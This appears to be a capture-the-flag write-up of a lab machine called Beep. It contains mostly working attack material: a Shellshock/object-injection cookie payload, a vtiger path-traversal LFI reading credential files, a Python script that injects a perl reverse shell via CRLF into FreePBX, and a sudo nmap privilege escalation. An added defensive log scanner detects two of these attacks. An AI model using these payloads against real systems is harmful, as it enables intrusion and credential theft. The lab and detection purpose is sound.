Beep

Introduction:
Recon
# nmap -sS -sV -sC -T4 -O -oN nmap.beep.txt 10.10.10.7
Starting Nmap 7.91 ( https://nmap.org ) at 2020-12-23 11:21 EST
Nmap scan report for 10.10.10.7
Host is up (0.014s latency).
Not shown: 988 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey:
| 1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_ 2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp open smtp Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN,
80/tcp open http Apache httpd 2.2.3
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
110/tcp open pop3 Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: TOP EXPIRE(NEVER) UIDL IMPLEMENTATION(Cyrus POP3 server v2) USER LOGIN-DELAY(0) APOP PIPELINING AUTH-RESP-CODE RESP-CODES STLS
111/tcp open rpcbind 2 (RPC #100000)
| rpcinfo:
| program version port/proto service
| 100000 2 111/tcp rpcbind
| 100000 2 111/udp rpcbind
| 100024 1 875/udp status
|_ 100024 1 878/tcp status
143/tcp open imap Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: SORT=MODSEQ THREAD=REFERENCES RENAME CONDSTORE ATOMIC IDLE RIGHTS=kxte URLAUTHA0001 IMAP4 MULTIAPPEND LISTEXT QUOTA THREAD=ORDEREDSUBJECT ACL MAILBOX-REFERRALS CATENATE UNSELECT CHILDREN UIDPLUS STARTTLS NO Completed ANNOTATEMORE IMAP4rev1 BINARY LIST-SUBSCRIBED X-NETSCAPE ID LITERAL+ NAMESPACE OK SORT
443/tcp open ssl/https?
| ssl-cert: Subject: commonName=localhost.localdomain/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2017-04-07T08:22:08
|_Not valid after: 2018-04-07T08:22:08
|_ssl-date: 2020-12-23T17:32:57+00:00; +1h07m58s from scanner time.
993/tcp open ssl/imap Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp open pop3 Cyrus pop3d
3306/tcp open mysql MySQL (unauthorized)
|_ssl-cert: ERROR: Script execution failed (use -d to debug)
|_ssl-date: ERROR: Script execution failed (use -d to debug)
|_sslv2: ERROR: Script execution failed (use -d to debug)
|_tls-alpn: ERROR: Script execution failed (use -d to debug)
|_tls-nextprotoneg: ERROR: Script execution failed (use -d to debug)
4445/tcp open upnotifyp?
10000/tcp open http MiniServ 1.570 (Webmin httpd)
|_http-server-header: MiniServ/1.570
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.91%E=4%D=12/23%OT=22%CT=1%CU=34600%PV=Y%DS=2%DC=I%G=Y%TM=5FE370
OS:12%P=x86_64-pc-linux-gnu)SEQ(SP=CA%GCD=1%ISR=C8%TI=Z%CI=Z%II=I%TS=A)OPS(
OS:O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST11
OS:NW7%O6=M54DST11)WIN(W1=16A0%W2=16A0%W3=16A0%W4=16A0%W5=16A0%W6=16A0)ECN(
OS:R=Y%DF=Y%T=40%W=16D0%O=M54DNNSNW7%CC=N%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS
OS:%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=16A0%S=O%A=S+%F=AS%O=M54DST11NW7%RD=0
OS:%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Network Distance: 2 hops
Service Info: Hosts: beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1h07m57s

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 404.56 seconds

Notes:
- This host has several open ports to enumerate: an SMTP/POP3/IMAP mail stack (Postfix, Cyrus pop3d/imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4), web on 80/443 (Apache httpd 2.2.3), MySQL on 3306 and Webmin on 10000 (MiniServ 1.570).
- Port 4445/tcp also looks interesting: nmap only has a guess (upnotifyp?) for the service running there.
- Let's get a directory search and a nikto scan started while we manually enumerate some of these services.
Let's venture further into enumerating these services.
Enumeration
gobuster dir -u https://10.10.10.7 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t 24
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://10.10.10.7
[+] Threads: 24
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/12/23 20:34:17 Starting gobuster
===============================================================
/images (Status: 301)
/modules (Status: 301)
/mail (Status: 301)
/admin (Status: 301)
/static (Status: 301)
/lang (Status: 301)
/var (Status: 301)
/panel (Status: 301)
/libs (Status: 301)
/recordings (Status: 301)
/configs (Status: 301)
/vtigercrm (Status: 301)

===============================================================
2020/12/23 21:04:38 Finished
===============================================================

Webmin
perl ./746.pl 10.10.10.7 "cat /etc/passwd" /usr/share/wordlists/metasploit/common_roots.txt
[+] BruteForcing...
[+] trying to enter with: vagrant

[+] trying to enter with: zzzzzz

[+] trying to enter with: zzzz
Notes:
- The only RCE found for this Webmin version (746.pl) relies on brute-forcing CGI script names.
FreePBX
curl -ks -m20 "http://10.10.10.7/recordings/index.php" --cookie "ari_lang=() { :;};php -r 'set_time_limit(0);unlink("page.framework.php");file_put_contents("misc/audio.php", "");';ari_auth=O:8:"DB_mysql":6:{s:19:"_default_error_mode";i:16;s:22:"_default_error_options";s:9:"do_reload";s:12:"_error_class";s:4:"TEST";s:13:"was_connected";b:1;s:7:"options";s:3:"123";s:3:"dsn";a:4:{s:8:"hostspec";s:9:"localhost";s:8:"username";s:4:"root";s:8:"password";s:0:"";s:8:"database";s:7:"trigger";}};elastixSession=716ratk092555gl0b3gtvt8fo7;UICSESSION=rporp4c88hg63sipssop3kdmn2;ARI=b8e4h6vfg0jouquhkcblsouhk0" --data "username=admin&password=admin&submit=btnSubmit" >/dev/null
vTiger CRM 5.1.0
searchsploit -x php/webapps/18770.txt

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
mysql:x:27:27:MySQL Server:/var/lib/mysql:/bin/bash
distcache:x:94:94:Distcache:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
ntp:x:38:38::/etc/ntp:/sbin/nologin
cyrus:x:76:12:Cyrus IMAP Server:/var/lib/imap:/bin/bash
dbus:x:81:81:System message bus:/:/sbin/nologin
apache:x:48:48:Apache:/var/www:/sbin/nologin
mailman:x:41:41:GNU Mailing List Manager:/usr/lib/mailman:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
postfix:x:89:89::/var/spool/postfix:/sbin/nologin
asterisk:x:100:101:Asterisk VoIP PBX:/var/lib/asterisk:/bin/bash
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous NFS User:/var/lib/nfs:/sbin/nologin
sshd:x:74:74:Privilege-separated SSH:/var/empty/sshd:/sbin/nologin
spamfilter:x:500:500::/home/spamfilter:/bin/bash
haldaemon:x:68:68:HAL daemon:/:/sbin/nologin
xfs:x:43:43:X Font Server:/etc/X11/fs:/sbin/nologin
fanis:x:501:501::/home/fanis:/bin/bash
Since we can now read files on the machine, let's identify the files worth reading.
I came across the following list of FreePBX configuration files: http://www.telecomworld101.com/PiaF/ConfigurationFiles.html
view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/amportal.conf%00
Hit the jackpot with manager.conf:
view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/asterisk/manager.conf%00
Exploitation
# Python 2 script (urllib.urlopen): walks extensions 100-9999 and, for each one,
# requests callme_page.php with a CRLF-injected "Application: system" line in the
# callmenum parameter; when an extension exists the injected perl reverse shell runs.
import urllib
import time
rhost = "10.10.10.7"
lhost = "10.10.14.15"
lport = 4444
extension = 100

# Reverse shell payload
while extension < 10000:
    print("Trying extension: " + str(extension))
    url = 'https://'+str(rhost)+'/recordings/misc/callme_page.php?action=c&callmenum='+str(extension)+'@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20perl%20-MIO%20-e%20%27%24p%3dfork%3bexit%2cif%28%24p%29%3b%24c%3dnew%20IO%3a%3aSocket%3a%3aINET%28PeerAddr%2c%22'+str(lhost)+'%3a'+str(lport)+'%22%29%3bSTDIN-%3efdopen%28%24c%2cr%29%3b%24%7e-%3efdopen%28%24c%2cw%29%3bsystem%24%5f%20while%3c%3e%3b%27%0D%0A%0D%0A'
    urllib.urlopen(url)
    extension = extension + 1
    time.sleep(1)

eneloop@kinetic:~$ nc -lvnp 4444
listening on [any] 4444 ...
ls
ls
ls




ls
connect to [10.10.14.15] from (UNKNOWN) [10.10.10.7] 43606
ks-script-_a_xql
ks-script-_a_xql.log
ntpC5OCyW
sess_0haarafa2oid2474ul72j7tm50
sess_0t33dvgla1rjtvdv6p3dkcf0f0
sess_0v7d3flgjto7aj324diuic14r1
sess_1087i5oq6r9kdmv9tb0juhs077
sess_13ig3hjnkmcuq46fn2gvf7qmr6

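The defender's view of the two web requests used above (the vtiger sortfieldsjson.php traversal with a null byte, and the FreePBX callme_page.php CRLF injection), added here as an example and not part of the original write-up: a small scanner that flags both patterns in Apache access-log lines. The log lines, rule names and the classify/scan helpers are constructed for this example.

```python
import re
from urllib.parse import unquote

# Detection rules for the two attack paths shown in this write-up, matched
# against the URL-decoded request path (decoded twice to catch %252e style
# double encoding). re.S lets "." cross the injected CR/LF characters.
RULES = {
    "vtiger-lfi": re.compile(
        r"sortfieldsjson\.php\?module_name=.*(\.\./|\x00)", re.I | re.S),
    "freepbx-callme-injection": re.compile(
        r"callme_page\.php\?.*callmenum=.*[\r\n].*Application:", re.I | re.S),
}

# Common Log Format: client ident user [time] "METHOD path HTTP/x" status size
LOG_RE = re.compile(
    r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+')


def classify(line):
    """Return (client, rule_name) for a suspicious access-log line, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    client, _ts, _method, path, _status = m.groups()
    decoded = unquote(unquote(path))
    for name, rx in RULES.items():
        if rx.search(decoded):
            return client, name
    return None


def scan(lines):
    """Run classify() over every line and keep only the hits, in log order."""
    return [hit for hit in map(classify, lines) if hit]


# Constructed sample lines modelled on the requests in the write-up (not real logs).
SAMPLE_LOG = [
    '10.10.14.15 - - [23/Dec/2020:21:10:01 +0000] "GET /vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../etc/asterisk/manager.conf%00 HTTP/1.1" 200 812',
    '10.10.14.15 - - [23/Dec/2020:21:12:44 +0000] "GET /recordings/misc/callme_page.php?action=c&callmenum=100@from-internal/n%0D%0AApplication:%20system%0D%0AData:%20id HTTP/1.1" 200 0',
    '10.10.14.15 - - [23/Dec/2020:21:13:00 +0000] "GET /vtigercrm/index.php?module=Home HTTP/1.1" 200 4410',
]

if __name__ == "__main__":
    for client, rule in scan(SAMPLE_LOG):
        print(client, "->", rule)
```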
Post-exploit/PrivEsc
whoami
asterisk
python -c 'import pty;pty.spawn("/bin/bash");'
bash-3.2$ cd
cd
bash-3.2$ ls
ls
bin dev home lost+found mnt proc sbin srv tftpboot usr
boot etc lib media opt root selinux sys tmp var
bash-3.2$ cd /home/
cd /home/
bash-3.2$ cd asterisk
cd asterisk
bash: cd: asterisk: No such file or directory
bash-3.2$ pwd
pwd
/home
bash-3.2$ ls
ls
fanis spamfilter
bash-3.2$ cd fanis
cd fanis
bash-3.2$ ls
ls
user.txt
bash-3.2$ cat us
cat user.txt
5dbd43c8c1542961dcff41f970a1bcd7

bash-3.2$ sudo -l
sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper

PrivEsc
bash-3.2$ sudo nmap --interactive
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
!sh
sh-3.2# whoami
whoami
root
sh-3.2#

Notes: